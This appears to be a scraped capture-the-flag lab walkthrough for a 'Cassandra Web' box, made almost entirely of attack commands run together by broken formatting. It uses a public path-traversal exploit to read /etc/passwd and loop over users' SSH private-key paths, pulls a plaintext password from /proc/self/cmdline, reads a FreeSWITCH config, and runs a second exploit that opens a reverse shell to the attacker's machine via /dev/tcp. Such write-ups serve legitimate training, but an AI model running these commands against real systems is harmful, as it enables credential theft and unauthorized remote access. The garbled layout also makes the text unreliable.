Cassandra Web 3000 [Initial]

Exploiting for ssh key





Command example:


Checked Default password file of freeSwitch





Last updated













Last updated
searchsploit -m 49362
python3 49362.pypython3 49362.py -p 3000 $clue "/etc/passwd"python3 49362.py -p 3000 $clue "/etc/ssh/ssh_config"python3 49362.py -p 3000 $clue "/etc/passwd" > passwd_list.txtawk -F: '($3 == 0 || $3 >= 1000) {print $6}' passwd_list.txt > user_list.txtecho "/.ssh/id_rsa\n/.ssh/id_rsa.keystore\n/.ssh/id_rsa.pub\n/.ssh/authorized_keys\n/.ssh/known_hosts\n/.ssh/id_ecdsa\n/.ssh/id_ecdsa.pub\n/.ssh/id_ed25519\n/.ssh/id_dsa" > ssh_key.txt
# Directly run the script in the terminal, It will store all result in file named as result_ssh.txt
while read -r user; do
while read -r key; do
echo "\n=====\n" >> result_ssh.txt
echo "$user$key" >> result_ssh.txt
python3 49362.py -p 3000 $clue "$user$key"
done < ssh_key.txt
done < user_list.txt
# You have to modify the script according to the situation and need.
# Check for SSH key in file. cassmoney.py 10.0.0.5 /proc/self/cmdline-u cassie
-p SecondBiteTheApple330ssh cassie@$clue# Let's get its content from the vulnerability of the file read.
python3 49362.py -p 3000 $clue "/etc/freeswitch/autoload_configs/event_socket.conf.xml"sudo rlwrap -cAr nc -lnvp 80python3 47799.py $clue "bash -c \"bash -i >& /dev/tcp/$IP_KALI/80 0>&1\""(command -v python && python -c 'import pty; pty.spawn("/bin/bash");') || (command -v python3 && python3 -c 'import pty; pty.spawn("/bin/bash");')